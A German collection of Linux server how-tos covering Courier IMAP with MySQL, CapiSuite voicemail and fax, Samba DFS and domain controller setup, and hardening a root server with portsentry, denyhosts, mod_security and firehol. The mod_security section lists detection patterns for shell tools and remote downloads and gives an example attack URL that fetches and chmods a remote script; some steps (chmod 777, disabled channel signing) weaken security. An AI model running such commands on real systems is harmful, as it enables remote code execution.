Anleitung für Courier POP3/IMAP mit MySQL backend.

MYSQL_PASSWORD          password1
MYSQL_CRYPT_PWFIELD     password
MYSQL_DATABASE          courier
MYSQL_GID_FIELD         '5001'
MYSQL_HOME_FIELD        '/var/mail'
MYSQL_LOGIN_FIELD       username
MYSQL_MAILDIR_FIELD     maildir
MYSQL_NAME_FIELD        name
MYSQL_OPT               0
#MYSQL_PASSWORD          postfix
MYSQL_QUOTA_FIELD      quota
MYSQL_SERVER            localhost
MYSQL_SOCKET           /var/run/mysqld/mysqld.sock
MYSQL_UID_FIELD         '5001'
MYSQL_USERNAME          dbuser
MYSQL_USER_TABLE        mailbox
MYSQL_AUXOPTIONS_FIELD  CONCAT("disableimap=",disableimap,",disablepop3=",disablepop3)

Die entscheidende Zeile:

MYSQL_AUXOPTIONS_FIELD  CONCAT("disableimap=",disableimap,",disablepop3=",disablepop3)

CREATE TABLE `mailbox` (
  `username` varchar(255) NOT NULL default '',
  `password` varchar(255) NOT NULL default '',
  `name` varchar(255) NOT NULL default '',
  `maildir` varchar(255) NOT NULL default '',
  `quota` int(10) NOT NULL default '0',
  `domain` varchar(255) NOT NULL default '',
  `created` datetime NOT NULL default '0000-00-00 00:00:00',
  `modified` datetime NOT NULL default '0000-00-00 00:00:00',
  `active` tinyint(1) NOT NULL default '1',
  `disableimap` int(1) NOT NULL default '0',
  `disablepop3` int(1) NOT NULL default '0',
  PRIMARY KEY  (`username`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT='Postfix Admin - Virtual Mailboxes';

Folgende Zeilen kommen hinzu:

  `disableimap` int(1) NOT NULL default '0',
  `disablepop3` int(1) NOT NULL default '0',

Mit Feldwert 1 wird der jeweilige Dienst deaktiviert.

• Installierte ISDN Karte mit CAPI Treibern (→ AVM Fritzcard PCI unter Debian Etch)
• Mailserver (Postfix, Sendmail, Exim, Qmail, etc.)

apt-get install capisuite

Für Voicemail und Fax werden eigene User/Gruppen pro Voicemail/Fax benötigt.

# groupadd vm_test
# useradd -g vm_test -r vm_test

# nano /etc/capisuite/answering_machine.conf

Am Ende der Datei kann man seine eigenen Voicemails anlegen. Hier ein Beispiel:

[vm_test]
voice_numbers="55512345"
voice_action="MailAndSave"
record_length="60"
voice_delay="20"
voice_email="mail@example.org"
pin="12345"

In den eckigen Klammen steht der Username den wir vorhin angelegt haben.

Folgende Optionen sind jetzt eingestellt für diese Voicemail:

• voice_numbers – Die MSN auf der die Voicemail lauschen soll
• voice_action – Die Aktion die Ausgeführt werden soll wenn eine Aufzeichnung stattgefunden hat.
• record_length – Aufzeichnungsdauer
• voice_delay – Verzögerung bis die Voicemail den Anruf entgegen nimmt.
• voice_email – An diese Adresse wird die Voiceaufzeichnung geschickt.
• pin – Dies ist die Fernabfragepin

/etc/init.d/capisuite restart

Wed Dec  5 10:44:03 2007 Connection 0x8181648: Connection object created for incoming call PLCI 101 from 08955512345 to 55512345 CIP 0x10
Wed Dec  5 10:44:04 2007 Connection 0x8181648: call from 08955512345 to 55512345 for vm_test connecting with voice
Wed Dec  5 10:44:24 2007 Connection 0x8181648: accepting with service 0
Wed Dec  5 10:44:38 2007 Connection 0x8181648: disconnect initiated
Wed Dec  5 10:44:38 2007 Connection 0x8181648: connection lost with cause 0x3490,0x3301
Wed Dec  5 10:44:38 2007 Connection 0x8181648: Connection object deleted

Nachsehen ob eine Mail angekommen ist, ansonsten Mailserverlog überprüfen.

# nano /etc/capisuite/fax.conf

Am Ende der Datei kann man seine eigenen Faxe anlegen. Hier ein Beispiel:

[vm_test]
fax_numbers="55512346"
fax_stationID="+49 89 5551236"
fax_headline="Mein FAX"
fax_email="mail@example.com"
fax_action="MailAndSave"

In den eckigen Klammen steht der Username den wir vorhin angelegt haben.

Folgende Optionen sind jetzt eingestellt für diese Voicemail:

• fax_numbers – Die MSN auf der die Faxgerät lauschen soll
• fax_action – Die Aktion die Ausgeführt werden soll wenn eine Aufzeichnung stattgefunden hat.
• fax_stationID – Stationskennung
• fax_headline – Fax Name
• fax_email – An diese Adresse wird die Faxaufzeichnung geschickt.

/etc/init.d/capisuite restart

Wed Dec  5 10:57:14 2007 Connection 0x8181648: Connection object created for incoming call PLCI 101 from 08955512346 to 55512346 CIP 0x4
Wed Dec  5 10:57:14 2007 Connection 0x8181648: call from 08955512346 to 55512346 for vm_test connecting with fax
Wed Dec  5 10:57:14 2007 Connection 0x8181648: accepting with service 1
Wed Dec  5 10:57:37 2007 Connection 0x8181648: disconnect initiated
Wed Dec  5 10:57:37 2007 Connection 0x8181648: connection lost with cause 0x3400,0x0
Wed Dec  5 10:57:38 2007 Connection 0x8181648: Connection object deleted

Nachsehen ob eine Mail angekommen ist, ansonsten Mailserverlog überprüfen.

Viel Spaß mit dem neuen System.

Samba 3 erweitern mit DFS.

Anleitung für Debian Sarge / Etch, Ubuntu

Legen Sie ein Verzeichnis für das DFS root an:

  mkdir /home/samba/dfsroot chmod 777 /home/samba/dfsroot

Änderungen in der smb.conf

Fügen Sie unter [global] Folgendes hinzu:

  host msdfs = yes

Weiter unten dann bei den Verzeichnissen dann Folgendes:

  [dfsroot]
  path = /home/samba/dfsroot
  msdfs root = yes
  comment = DFS root

Starten Sie den Server neu:

  /etc/init.d/samba restart

Gehen Sie in das DFS Verzeichnis:

  cd /home/samba/dfsroot

Jetzt können Sie in diesem Verzeichnis andere Netzlaufwerke einhängen:

  ln -s msdfs:<server>\<freigabe> <ordnername>

Die 2 Backslashes sind richtig.

Beispiel:

  ln -s msdfs:filesrv1\daten daten

Danach ist die Freigabe von \FILESRV1\DATEN sofort im dfsroot unter daten erreichbar. Sie müssen den Server nicht mehr neustarten.

Anleitung für Debian Sarge/Etch, Ubuntu

In verschiedenen Fällen kann es vorkommen, das man mehrere IP-Adressen auf einem Interface benötigt.

Ich zeige euch wie man am einfachsten virt. IP`s hinzufügt.

Als erstes mit einem Editor die interfaces Datei öffnen:

  nano /etc/network/interfaces

Passt eure eth an (manche haben eth0,eth1,eth2 etc.)

Hinter dem Doppelpunkt wird die viretuelle Schnittstelle angegeben. Sie wird pro Schnittstelle um 1 erhöht.

  auto eth0:0
  iface eth0:0 inet static
  address 192.168.4.101
  netmask 255.255.255.0
  network 192.168.4.0
  broadcast 192.168.4.255

Die Datei interfaces speichern und mit:

  /etc/init.d/networking restart

die Config neu laden.

Diese Anleitung sollte auf allen debianbasierten Distributionen funktionieren. Bei mir daheim ist es im Einsatz auf einer Debian Etch Maschine (Kernel: 2.6.18-5-686) und funktioniert prima. Grund für die Installation war → Capisuite, ein Voicemail / Fax System.

# uname -r
2.6.18-3-686

# apt-get install linux-headers-$(uname -r) build-essential rpm capiutils

Quelle: http://opensuse.fltronic.de/

# wget http://opensuse.foehr-it.de/rpms/10_2/src/fcpci-0.1-0.src.rpm

# rpm2cpio fcpci-0.1-0.src.rpm | cpio -i

# tar xzvf fcpci-suse93-3.11-07.tar.gz

# cd fritz
# patch -p1 < ../fritz-tools.diff
# ./install

HINWEIS: Nach jedem Kernelupdate muss der Treiber neu kompiliert werden. (./install)

hisax Treiber hat Probleme mit dem Orginalen AVM Treiber.

# lsmod | grep ^hisax
# rmmod hisax_fcpcipnp
# rmmod hisax_isac
# rmmod hisax

# modprobe -v fcpci

# capiinit

# capiinfo

Das Ergebnis sollte so ähnlich aussehen:

# capiinfo
Number of Controllers : 1
Controller 1:
Manufacturer: AVM GmbH
CAPI Version: 2.0
Manufacturer Version: 3.11-07  (49.23)
Serial Number: 1000001
BChannels: 2
Global Options: 0x00000039
   internal controller supported
   DTMF supported
   Supplementary Services supported
   channel allocation supported (leased lines)
B1 protocols support: 0x4000011f
   64 kbit/s with HDLC framing
   64 kbit/s bit-transparent operation
   V.110 asynconous operation with start/stop byte framing
   V.110 synconous operation with HDLC framing
   T.30 modem for fax group 3
   Modem asyncronous operation with start/stop byte framing
B2 protocols support: 0x00000b1b
   ISO 7776 (X.75 SLP)
   Transparent
   LAPD with Q.921 for D channel X.25 (SAPI 16)
   T.30 for fax group 3
   ISO 7776 (X.75 SLP) with V.42bis compression
   V.120 asyncronous mode
   V.120 bit-transparent mode
B3 protocols support: 0x800000bf
   Transparent
   T.90NL, T.70NL, T.90
   ISO 8208 (X.25 DTE-DTE)
   X.25 DCE
   T.30 for fax group 3
   T.30 for fax group 3 with extensions
   Modem

  0100
  0200
  39000000
  1f010040
  1b0b0000
  bf000080
  00000000 00000000 00000000 00000000 00000000 00000000
  01000001 00020000 00000000 00000000 00000000

Supplementary services support: 0x000003ff
   Hold / Retrieve
   Terminal Portability
   ECT
   3PTY
   Call Forwarding
   Call Deflection
   MCID
   CCBS

Damit der Treiber beim Systemstart geladen wird muss vor fcpci das Semikolon entfernt werden.

# nano /etc/isdn/capi.conf

# card          file            proto   io      irq     mem     cardnr  options
#b1isa          b1.t4           DSS1    0x150   7       -       -       P2P
#b1pci          b1.t4           DSS1    -       -       -       -
#c4             c4.bin          DSS1    -       -       -       -
#c4             -               DSS1    -       -       -       -
#c4             -               DSS1    -       -       -       -       P2P
#c4             -               DSS1    -       -       -       -       P2P
#c2             c2.bin          DSS1    -       -       -       -
#c2             -               DSS1    -       -       -       -
#t1isa          t1.t4           DSS1    0x340   9       -       0
#t1pci          t1.t4           DSS1    -       -       -       -
fcpci           -               -       -       -       -       -
#fcpcmcia       -               -       -       -       -       -
#fcusb          -               -       -       -       -       -
#fxusb          -               -       -       -       -       -
#fcclassic      -               -       0x150   10      -       -
#fcdsl          fdslbase.bin    DSS1    -       -       -       -
#fcdsl2         fdsl2base.bin   DSS1    -       -       -       -
#fcdslsl        fdssbase.bin    DSS1    -       -       -       -
#fcdslslusb     fdlubase.frm    DSS1    -       -       -       -
#fcdslusba      fdlabase.frm    DSS1    -       -       -       -
#fcdslusb2      fds2base.frm    DSS1    -       -       -       -
#fcdslusb       fdsubase.frm    DSS1    -       -       -       -

Nach einem Reboot kann man nochmal mit capiinfo abfragen ob der Treiber korrekt geladen ist.

Einfacher PDC Server

Installationsanleitung für einen PDC Server mit Samba 3 auf Debian Sarge/Etch.

* Für wen ist das Howto? Dieses Howto richtet sich an Leute, die gerade aus der Windows Welt den Weg zu Linux / Debian gefunden haben.

* Was kann der Samba 3 PDC Server? Ein Samba 3 PDC Server kann einen Windows NT / 2000 Server (abgesehen vom ADS) komplett ersetzen. Allerdings muss man hier keine Lizenzkosten an Microsoft abdrücken. Er kann Anmeldeserver, Fileserver, Druckserver und Memberserver sein. In diesem Howto richten wir den Debian Samba Server als vollwertigen PDC (Primary Domain Controller) ein.

Als erstes müssen wir das Samba-Paket mit apt installieren. Ich installiere gleich smbfs mit, damit ich Verzeichnisfreigaben von anderen PCs / Servern in Linux mounten kann. Man kann es aber auch weglassen

apt-get install samba smbfs

Jetzt legen wir eine Gruppenstruktur fest, die später für die Domäne gilt. Für die Samba Gruppen hänge ich immer ein S- vorne dran.

Die Gruppen

S-Admins: In dieser Gruppe sind alle Domänenadmins drin.
S-Users: Dort sind alle normalen User drin.
S-Computers: Hier werden alle Computerkontos abgelegt.

groupadd S-Admins
groupadd S-Users
groupadd S-Computers 

Diese Benutzer haben auf dem Linux Server keine Rechte, um sich lokal anzumelden ! Diese User funktionieren nur für Samba.

Einen Admin:

useradd -g S-Admins -s /bin/false -d /dev/null Administrator

Einen normalen User:

useradd -g S-Users -s /bin/false -d /dev/null benutzer1

Natürlich können auch noch andere Gruppen und User nach diesem Schema angelegt werden.

Jetzt benötigen wir noch ein Verzeichnis, in das wir später die Logonscripte u. a. ablegen. Ich verwende dafür einfach das /home Verzeichnis.

mkdir -p /home/samba/netlogon

Wenn die Installation erfolgreich beendet worden ist, können wir Samba konfigurieren.
Wir legen erstmal eine Sicherungskopie der Orginalkonfiguration an.

cp /etc/samba/smb.conf /etc/samba/smb.conf.orginal

Mein Lieblingseditor ist nano, deshalb:

nano /etc/samba/smb.conf -w

Nun können wir uns an die Konfiguration wagen.

  [global]
  
  # NetBIOS Name - Mit diesem Namen erscheint der Server in der Domäne.
  netbios name = SERVER
  
  # Gibt an wie später die Domäne heisst
  workgroup = MEINEDOMAIN
  
  # Gibt den Serverstring
  server string = %h server (Samba %v)
  
  domain master = yes
  local master = yes
  domain logons = yes
  os level = 65
  
  admin users = @S-Admins,root
    
  #Dieser Parameter muss auf user stehen !! Wer diesen Wert auf domain stellt, macht aus dem Server einen BDC/Member Server !!!
  security = user
  
  # Verschlüsselte Passwörter 
  encrypt passwords = true
  
  # Als Passwort Datenbank nehmen wir tdbsam. Es ist performanter als /etc/samba/smbpasswd
  passdb backend = tdbsam:/var/lib/samba/passdb.tdb guest
  obey pam restrictions = yes
  
  # Wichtig ! Ohne Wins hat es bei mir nicht funktioniert !
  wins support = yes
  
  # Diese Scripts sorgen dafür, dass User- und Computeraccounts automatisch angelegt werden, wenn man dazu berechtigt ist.
  add user script = /usr/sbin/useradd -m %u
  delete user script = /usr/sbin/userdel -r %u
  add group script = /usr/sbin/groupadd %g
  delete group script = /usr/sbin/groupdel %g
  add user to group script = /usr/sbin/usermod -G %g %u
  add machine script = /usr/sbin/useradd -s /bin/false -d /dev/null -g S-Computers %u
  
  [homes]
  comment = Home Directories
  browseable = no
  writable = yes
  create mask = 0775
  directory mask = 0775
  
  [netlogon]
  comment = Network Logon Service
  path = /home/samba/netlogon
  guest ok = yes
  writable = no
  share modes = no

Jetzt starten wir den Samba Server neu.

Erst mit testparm smb.conf kontrollieren.

testparm

testparm gibt im Falle einer Fehlkonfiguration der smb.conf eine Meldung zurück.

Neustart.

/etc/init.d/samba restart

Eventuell anhand der Logs in /var/log/samba kontrollieren, ob der Server korrekt läuft.

Um einen User in die Sambadatenbank einzubinden, muss er bereits in der /etc/passwd angelegt sein, was wir oben bei der Vorbereitung bereits mit useradd gemacht haben.

Administrator anlegen:

smbpasswd -a Administrator

Administrator aktivieren:

smbpasswd -e Administrator

Benutzer anlegen:

smbpasswd -a benutzer1

Benutzer aktivieren:

smbpasswd -e benutzer1

smbpasswd wird jetzt nach einem Passwort fragen. Mit diesem Passwort melden Sie sich dann an. Vergessen Sie nicht, wenigstens einem Administrator ein Passwort zuzuweisen und zu aktivieren. Nur ein Administrator darf einen Computer in eine Domäne einbinden. Spätestens im nächsten Abschnitt wird dies benötigt (Siehe Abschnitt „Anlegen der ersten Benutzer“ weiter vorn in diesem HowTo).

Normalerweise bindet man einen Rechner bei Windows XP über:

Arbeitsplatz [rechtsklick] --> Eigenschaften --> Computername --> Button Ändern

in die Domäne ein.

ACHTUNG !! Bei Windows XP muss folgender Schlüssel in den Lokalen Sicherheitseinstellungen (Programme → Verwaltung → lokale Sicherheitsrichtlinie) deaktiviert werden

Sicherheitseinstellungen –> Lokale Richtlinien –> Sicherheitsoptionen Domänenmitglied: Daten des sicheren Kanals digital verschlüsseln oder signieren (immer) : deaktivieren

Wenn man aber kein add machine script definiert hat, muss man den Computeraccount manuell anlegen.

useradd -g S-Computers -s /bin/false COMPUTERNAME$
smbpasswd -a -m COMPUTERNAME$

Danach sollte das Einbinden in die Domäne ohne Probleme über den Dialog möglich sein.

Fertig!!!!

Einen Rootserver absichern mit:

• portsentry – Überwacht alle Ports und erkennt Portscanning und blockiert die IP-Adresse dynamisch

• denyhosts – Überwacht Logfiles und sperrt die IP-Adresse sobald x Loginversuche per SSH unternommen worden sind ins System einzudringen.
• mod_security für Apache2 – IDS Firewall für Apache – Erkennt allow_url_fopen attacks, URL attacks (wget), SQL attacks usw. Regeln können auch selbst definiert werden Regelsätze von ModSecurity
• chkrootkit – Erkennt bekannte Rootkits.
• aide – Erzeugt eine Datenbank welche mit Checksummen Dateien auf dem System prüft und erkennt wenn eine Datei verändert worden ist. (z.B. Rootkits)
• logwatch – Erzeugt eine übersichtliche Zusammenfassung aller Events die von Bedeutung sind und kann diese per Mail verschicken.
• firehol – Tool zum Erstellen von iptables Regelsätzen

Anleitung für Debian Sarge

~~UP~~

  apt-get install portsentry

  nano /etc/portsentry/portsentry.conf

Per default ist in der Konfiguration schon eingestellt das er Ports nur unter 1024 überwacht was ausreichend ist, da sich hier die meisten brisanten Dienste ansiedeln. Wenn alles gesperrt werden soll müssen folgende Parameter angepasst werden:

  ADVANCED_PORTS_TCP="1024"
  ADVANCED_PORTS_UDP="1024"

Folgende Parameter wurden geändert:

  BLOCK_UDP="0" -> BLOCK_UDP="1"
  BLOCK_TCP="0" -> BLOCK_TCP="1"
  #KILL_HOSTS_DENY="ALL: $TARGET$" -> KILL_HOSTS_DENY="ALL: $TARGET$"

BLOVK_UDP und BLOCK_TCP verhindern Portscans wenn Sie auf “1” gesetzt werden. KILL_HOSTS_DENY ist die Aktion die gestartet werden soll wenn ein Angreifer gesperrt werden soll. Dieser wird in diesem Fall über /etc/hosts.deny gesperrt.

  /etc/init.d/portsentry restart

Achtung ! Wenn Portsentry mit einem Portscanner getestet wird kann man sich selbst aussperren !

Dann ist nur noch Zugriff über die Rettungskonsole oder mit einer neuen dynamischen IP-Adresse möglich.

Fertig!

~~UP~~

Für denyhosts gibt es kein fertiges Debianpaket deshalb muss es downgeloaded werden.

Denyhosts basiert auf Phyton deshalb installieren wir folgende Pakete:

  apt-get install python python2.3-dev python2.3

Jetzt besorgen wir uns Denyhosts entpacken und installieren es:

  cd /tmp
  wget http://mesh.dl.sourceforge.net/sourceforge/denyhosts/DenyHosts-2.0.tar.gz
  tar xvfz DenyHosts-2.0.tar.gz
  cd DenyHosts-2.0
  python setup.py install

Denyhosts wird in foldenden Pfad installiert:

  /usr/share/denyhosts

  cd /usr/share/denyhosts
  cp denyhosts.cfg-dist denyhosts.cfg
  nano denyhosts.cfg

  SECURE_LOG = /var/log/auth.log
  HOSTS_DENY = /etc/hosts.deny
  PURGE_DENY =
  BLOCK_SERVICE  = sshd
  DENY_THRESHOLD_INVALID = 5
  DENY_THRESHOLD_VALID = 10
  DENY_THRESHOLD_ROOT = 5
  WORK_DIR = /usr/share/denyhosts/data
  SUSPICIOUS_LOGIN_REPORT_ALLOWED_HOSTS=YES
  HOSTNAME_LOOKUP=YES
  LOCK_FILE = /var/run/denyhosts.pid
  ADMIN_EMAIL = foo@bar.com
  SMTP_HOST = localhost
  SMTP_PORT = 25
  SMTP_FROM = DenyHosts <nobody@localhost>
  SMTP_SUBJECT = DenyHosts Report
  AGE_RESET_VALID=5d
  AGE_RESET_ROOT=25d
  AGE_RESET_INVALID=10d
  DAEMON_LOG = /var/log/denyhosts
  DAEMON_SLEEP = 30s
  DAEMON_PURGE = 1h

Bitte darauf achten, das die korrekten Pfade für SECURE_LOG und LOCK_FILE gesetzt sind. Bei Debian sind diese:

  SECURE_LOG = /var/log/auth.log
  LOCK_FILE = /var/run/denyhosts.pid

Folgende drei Parameter müssen in der Datei /usr/share/denyhosts/daemon-control angepasst werden:

  DENYHOSTS_BIN = "/usr/bin/denyhosts.py"
  DENYHOSTS_LOCK = "/var/run/denyhosts.pid"
  DENYHOSTS_CFG = "/usr/share/denyhosts/denyhosts.cfg"

Beispiel:

  #!/usr/bin/env python
  # denyhosts     Bring up/down the DenyHosts daemon
  #
  # chkconfig: 2345 98 02
  # description: Activates/Deactivates the
  #    DenyHosts daemon to block ssh attempts
  #
  ###############################################

  ###############################################
  #### Edit these to suit your configuration ####
  ###############################################

  DENYHOSTS_BIN   = "/usr/bin/denyhosts.py"
  DENYHOSTS_LOCK  = "/var/run/denyhosts.pid"
  DENYHOSTS_CFG   = "/usr/share/denyhosts/denyhosts.cfg"

  ###############################################
  ####         Do not edit below             ####
  ###############################################

  import os, sys, signal, time

  STATE_NOT_RUNNING = -1
  STATE_LOCK_EXISTS = -2

  def usage():
      print "Usage: %s {start [args...] | stop | restart [args...] | status | debug | condrestart [args...] }" % sys.argv[0]
      print
      print "For a list of valid 'args' refer to:"
      print "$ denyhosts.py --help"
      print
      sys.exit(0)

  def getpid():
      try:
          fp = open(DENYHOSTS_LOCK, "r")
          pid = int(fp.readline().rstrip())
          fp.close()
      except Exception, e:
          return STATE_NOT_RUNNING

      if os.access(os.path.join("/proc", str(pid)), os.F_OK):
          return pid
      else:
          return STATE_LOCK_EXISTS

  def start(*args):
      cmd = "%s --daemon " % DENYHOSTS_BIN
      if args: cmd += ' '.join(args)

      print "starting DenyHosts:   ", cmd

      os.system(cmd)

  def stop():
      pid = getpid()
      if pid >= 0:
          os.kill(pid, signal.SIGTERM)
          print "sent DenyHosts SIGTERM"
      else:
          print "DenyHosts is not running"

  def debug():
      pid = getpid()
      if pid >= 0:
          os.kill(pid, signal.SIGUSR1)
          print "sent DenyHosts SIGUSR1"
      else:
          print "DenyHosts is not running"

  def status():
      pid = getpid()
      if pid == STATE_LOCK_EXISTS:
          print "%s exists but DenyHosts is not running" % DENYHOSTS_LOCK
      elif pid == STATE_NOT_RUNNING:
          print "Denyhosts is not running"
      else:
          print "DenyHosts is running with pid = %d" % pid

  def condrestart(*args):
      pid = getpid()
      if pid >= 0:
          restart(*args)

  def restart(*args):
      stop()
      time.sleep(1)
      start(*args)

  if __name__ == '__main__':
      cases = {'start':       start,
               'stop':        stop,
               'debug':       debug,
               'status':      status,
               'condrestart': condrestart,
               'restart':     restart}

      try:
          args = sys.argv[2:]
      except:
          args = []

      try:
          option = sys.argv[1]

          if option in ('start', 'restart', 'condrestart'):
              if '--config' not in args and '-c' not in args:
                  args.append("--config=%s" % DENYHOSTS_CFG)

          cmd = cases[option]
          apply(cmd, args)
      except:
          usage()

Den Eigentümer auf root setzen und 700 als Rechte

  chown root daemon-control
  chmod 700 daemon-control

Denyhosts zu den Daemons hinzufügen

  cd /etc/init.d
  ln -s /usr/share/denyhosts/daemon-control denyhosts
  update-rc.d denyhosts defaults

  /etc/init.d/denyhosts start

Fertig!

~~UP~~

Problem: Das Paket was von den Debian Packet Maintainern zurverfügung gestellt wird ist eine alte 0.8.4 Version. Diese unterstützt einige Parameter zum deaktivieren von Rules nicht. Deshalb fügen wir noch eine Source Quelle zu sources.list hinzu.

  nano /etc/apt/sources.list

Folgdende zeilen einfach an das Ende anfügen:

  deb http://etc.inittab.org/~agi/debian/libapache-mod-security/sarge ./

Dann noch ein

  apt-get update

um die Paketinformationen zu bekommen.

Modul installieren:

  apt-get install libapache2-mod-security

Modul zu Apache 2 installieren:

  a2enmod mod-security

Schritt 2: Konfiguration bearbeiten

  cd /etc/apache2

Erstellen der mod_sec_filter.conf:

  touch mod_sec-filter.conf

Beispiel:

  # -----------------------------------------------------------------------------
  #  Start Rules (Gerneric)
  # -----------------------------------------------------------------------------

  # Enforce proper HTTP requests
  SecFilterSelective THE_REQUEST "!HTTP\/(0\.9|1\.0|1\.1)$"

  # check for bad meta characters in User-Agent field
  SecFilterSelective HTTP_USER_AGENT ".*\'"

  # Require Content-Length to be provided with every POST request
  SecFilterSelective REQUEST_METHOD "^POST$" chain
  SecFilterSelective HTTP_Content-Length "^$"

  # Don't accept transfer encodings we know we don't handle (and you don't need it anyway)
  SecFilterSelective HTTP_Transfer-Encoding "!^$"

  # Don't accept chunked encodings
  SecFilterSelective HTTP_Transfer-Encoding "chunked"

  # must have a useragent string
  SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

  # Again, this is better protected by removing these functions in php.ini
  SecFilterSelective ARGS "(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("

  # Prevent path traversal (..) attacks
  SecFilter "\.\./"

  # generic recursion signature
  SecFilterSelective THE_REQUEST "\.\./\.\./"

  # generic attack sig
  SecFilterSelective THE_REQUEST "cd *\;(cd|\;|echo|perl|python|rpm|yum|apt-get|emerge|lynx|links|mkdir|elinks|cmd|pwd|
  wget|id|uname|cvs|svn|(s|r)(cp|sh)|rexec|smbclient|t?ftp|ncftp|curl|telnet|gcc|cc|g\+\+|\./)"

  # generic filter to prevent SQL injection attacks
  SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|
  describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]"

  # generic PHP remote file inclusion attack
  SecFilter "\.php\?" chain
  SecFilter "(http|https|ftp)\:/" chain
  SecFilter "cmd=(cd|\;|perl|python|rpm|yum|apt-get|emerge|lynx|links|mkdir|elinks|cmd|pwd|wget|id|
  uname|cvs|svn|(s|r)(cp|sh)|rexec|smbclient|t?ftp|ncftp|curl|telnet|gcc|cc|g\+\+|\./)"

  # generic sig for more bad PHP functions
  SecFilterSelective THE_REQUEST "chr\(([0-9]{1,3})\)"
  SecFilterSelective THE_REQUEST "chr\([0-9a-fA-Fx]+\)"

  # SQL injection attacks
  SecFilter "delete[[:space:]]+from"
  SecFilter "insert[[:space:]]+into"
  SecFilter "select.+from"

  # SQL injection in cookies
  SecFilterSelective COOKIE_sessionid ".*(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|
  describe)[[:space:]]+[A-Z|a-z|0-9|\*||\,]+[[:space:]]+(from|into|table|database|index|view)"

  # -----------------------------------------------------------------------------
  #  Start Rules (experimental)
  # -----------------------------------------------------------------------------

  # experimental generic remote download sig foo IP or FQDN or foo http/https/ftp://whatever
  SecFilterSelective THE_REQUEST "(perl|t?ftp|links|elinks|lynx|ncftp|(s|r)(cp|sh)|wget|curl|cvs|svn).* ((http|https|ftp)\:/|
  [0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|.*[A-Za-z|0-9]\.[a-zA-Z]{2,4}/)"
  SecFilterSelective THE_REQUEST "( |\;|/|\'|,|\&|\=|\.)((s|r)(sh|cp)) *(.*\@.*|(http|https|ftp)\:/|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|.*[A-Za-z|
  0-9]\.[a-zA-Z]{2,4}/)"

  # XSS atacks (HTML/Javascript injection)
  # SecFilter "<(.| )+>"
  # deactivated since it causes problems with Serendipity when creating new entries
  # this is the error message: mod_security-message: Access denied with code 406. Pattern match "<(.| )+>" at POST_PAYLOAD.

Erstellen der mod_security.conf:

  cd /etc/apache2/conf.d
  touch mod_security.conf
  nano mod_security.conf

Beispiel:

  <IfModule mod_security.c>

      # Only inspect dynamic requests
      # (YOU MUST TEST TO MAKE SURE IT WORKS AS EXPECTED)
      # SecFilterEngine DynamicOnly

      # Turn the filtering engine On or Off
      SecFilterEngine On

      # Reject requests with status 404
      SecFilterDefaultAction "deny,log,status:404"

      # Some sane defaults
      SecServerResponseToken Off
      SecFilterScanPOST Off
      SecFilterCheckURLEncoding On
      SecFilterCheckCookieFormat On
      SecFilterCheckUnicodeEncoding Off

      # If you want to scan the output, uncomment these
      # SecFilterScanOutput On
      # SecFilterOutputMimeTypes "(null) text/html text/plain"

      # Accept almost all byte values
      SecFilterForceByteRange 1 255

      # Only record the interesting stuff
      SecAuditEngine RelevantOnly
      SecAuditLog /var/log/apache/audit_log

      # You normally won't need debug logging
      SecFilterDebugLevel 0
      SecFilterDebugLog /var/log/apache/modsec_debug_log

      # Include rules
      Include /etc/apache2/mod_sec_filter.conf
  </IfModule>

  /etc/init.d/apache2 restart

Mit dieser Konfiguration sollte es nicht mehr möglich sein folgenden Link aufzurufen:

Beispiel:

http://-deine-seite.de-/deinscript.php?irgendwas=cmd|cd%20/tmp%20|wget%20foobar.org/boesesscript|chmod%20755%20boesesscript|usw.

Um in einer Webseite einen Filter auszuschließen muss Ihm eine ID zugeordnet werden:

z.B. SecFilter wget id:1003

Im Vhost wird dann mit einer Directory Anweisung der Filter ausgeschlossen:

  <Directory /var/www/webseite/pma>
   SecFilterRemove 1003
  </Directory>

Um alle Filter zu deaktivieren für ein Verzeichnis einfach:

  <Directory /var/www/webseite/pma>
   SecFilterInheritance Off
  </Directory>

Dies deaktiviert die Filtervererbung in dieses Verzeichnis.

Fertig!

~~UP~~

  apt-get install chkrootkit

  nano /etc/chkrootkit.conf

Folgende Parameter in dieser Datei setzen:

  RUN_DAILY="true"
  RUN_DAILY_OPTS="-q"

Fertig!

  apt-get install aide

Kommt noch

Kommt noch

Kommt noch

~~UP~~

Kommt noch

~~UP~~

  apt-get install firehol

Vorhandene Filtersets sind auf folgender Webseite verfügbar:

FireHOL Services

  #
  # $Id: client-all.conf,v 1.2 2002/12/31 15:44:34 ktsaou Exp $
  #
  # This configuration file will allow all requests originating from the
  # local machine to be send through all network interfaces.
  #
  # No requests are allowed to come from the network. The host will be
  # completely stealthed! It will not respond to anything, and it will
  # not be pingable, although it will be able to originate anything
  # (even pings to other hosts).
  #

  version 5

  # Diese Zeilen auskommentieren
  #interface any world
  #       client all accept

  # Alle öffentlichen IP-Adressen ausser private z.B. 192.168.0.0/16
  interface eth0 INTERNET src not "${UNROUTABLE_IPS}"

  # Default Policy wenn keine Regel zutrifft
  policy drop

  # Verschiedene Schutzmechanismen
  protection reverse icmp-floods          30/min 20
  protection reverse syn-floods
  protection reverse invalid
  protection reverse fragments
  protection reverse malformed-xmas
  protection reverse malformed-null
  protection reverse malformed-bad
  protection icmp-floods                  30/min 20
  protection syn-floods
  protection invalid
  protection fragments
  protection malformed-xmas
  protection malformed-null
  protection malformed-bad

  #########################################################
  #Eingehend
  #########################################################

  # Eingehend SSH
  server ssh accept

  # Eingehend HTTP/HTTPS
  server http accept
  server https accept

  # Eingehend DNS
  server dns accept

  # Eingehend POP3/POP3s
  server pop3 accept
  server pop3s accept

  # Eingehend IMAP/IMAPs
  server imap accept
  server imaps accept

  # Eingehend SMTP
  server smtp accept

  # Eingehend FTP
  server ftp accept

  #########################################################
  #Ausgehened
  #########################################################

  # Nur "root" darf HTTP/FTP ausgehend verwenden
  client http             accept          user "root"
  client ftp              accept          user "root"
  # Alle dürfen DNS/SSH
  client dns              accept
  client ssh              accept
